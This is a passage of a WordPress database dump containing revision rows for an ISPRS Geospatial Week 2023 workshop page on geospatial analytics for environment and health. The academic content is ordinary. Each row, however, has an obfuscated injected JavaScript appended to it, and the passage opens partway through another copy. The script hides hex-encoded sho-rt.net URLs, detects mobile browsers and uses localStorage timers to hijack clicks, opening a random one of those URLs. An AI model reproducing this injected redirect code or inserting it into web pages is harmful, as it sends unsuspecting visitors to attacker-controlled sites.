_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2023-02-05 14:41:23','2023-02-05 14:41:23','',3386,'https://gsw2023.com/?p=3845',0,'revision','',0),
(3846,1,'2023-02-05 14:41:38','2023-02-05 14:41:38','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3446\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\">Geospatial Data Analytics for Physical Geography Impact Assessment on Environment, Health and Society</span></h5>\r\n&nbsp;\r\n<h5></h5>\r\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\r\n<h5>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\r\n<h5><em> </em></h5>\r\n<h5 style=\"text-align: justify;\"><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\r\n<h5></h5>\r\n<h5 style=\"text-align: justify;\"><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" post_content_paddings=\"5px 0px 5px 0px\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\r\n<table width=\"588\">\r\n<tbody>\r\n<tr>\r\n<td width=\"270\"><em><strong>Air pollution</strong></em></td>\r\n<td width=\"318\"><em><strong>Aerosols and AOD</strong></em></td>\r\n</tr>\r\n<tr>\r\n<td width=\"270\"><em><strong>Air /water quality</strong></em></td>\r\n<td width=\"318\"><em><strong>Vegetation</strong></em></td>\r\n</tr>\r\n<tr>\r\n<td width=\"270\"><em><strong>Disaster management</strong></em></td>\r\n<td width=\"318\"><em><strong>Land use changes and dynamics</strong></em></td>\r\n</tr>\r\n<tr>\r\n<td width=\"270\"><em><strong>Land degradation</strong></em></td>\r\n<td width=\"318\"><em><strong>Epidemiology and Disease mapping</strong></em></td>\r\n</tr>\r\n<tr>\r\n<td width=\"270\"><em><strong>GeoAI and Health analytics</strong></em></td>\r\n<td width=\"318\"><em><strong>Geospatial applications to Environment</strong></em></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<em>Research papers are invited with focus on application of <strong>Geospatial technogies including <u>Remote Sensing</u></strong> to the following  broad themes</em>\r\n\r\n&nbsp;\r\n\r\nThe main concern is related to methods of extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people.\r\n<h5><strong>Given below I to vi are the 6 grand challenges formulated so as to invite the potential  authors  to bring out their research results as a very specific outcome of the workshop to the maximum possible extent. </strong></h5>\r\n&nbsp;\r\n\r\nI.Environment and health are dependent on geographical variations, So understanding how physical geography is influencing social geography by using tools of geospatial technology is essential for effective management of environment. In general, we consider  remote sensing data due its variety, veracity, volume and velocity  is effective tool for addressing the unique challenges. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing. So this is one challenge thrown to potential authors to address in their presentation.\r\n\r\n&nbsp;\r\n\r\nII.Next challenge to be addressed by authors is on explanation related tp how much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect the society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school.\r\n\r\n&nbsp;\r\n\r\nIII.The third one is on how can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.\r\n\r\n&nbsp;\r\n\r\nIV.What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?\r\n\r\n&nbsp;\r\n\r\nV.The fifth challenge is about Remote sensing application to assessment of air quality and air pollution, atmospheric aerosols, atmospheric composition, and evaluating its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes\r\n\r\n&nbsp;\r\n\r\nVI.Disaster management is a great challenge and state-of-the-art Geospatial and GeoAI techniques application is emerging as a powerful tool. Here authors may address the challenges related to Geospatial Infrastructure Management Ecosystem (GeoIME), cloud-web-application including AI tools, early warning systems, monitoring, preparedness, data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images etc.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><u>Supporting ISPRS Working Groups:</u></h5>\r\n<ul>\r\n 	<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\r\n 	<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management</li>\r\n</ul>\r\nare the supporting working groups.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><u>Scientific Committee:</u></h5>\r\n<ul>\r\n 	<li>Peng Yue, Wuhan University, PR China</li>\r\n 	<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\r\n 	<li>Dr Suchita Gopal, Boston University. USA</li>\r\n 	<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\r\n 	<li>Dr Fazlay Faruq, University of Mississippi USA</li>\r\n 	<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\r\n 	<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\r\n 	<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of Mexico, Mexico</li>\r\n 	<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\r\nThe authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Geospatial Data Analytics for Physical Geography Impact Assessment on Environment, Health and Society</strong>','','inherit','closed','closed','','3427-revision-v1','','','2023-02-05 14:41:38','2023-02-05 14:41:38','',3427,'https://gsw2023.com/?p=3846',0,'revision','',0),
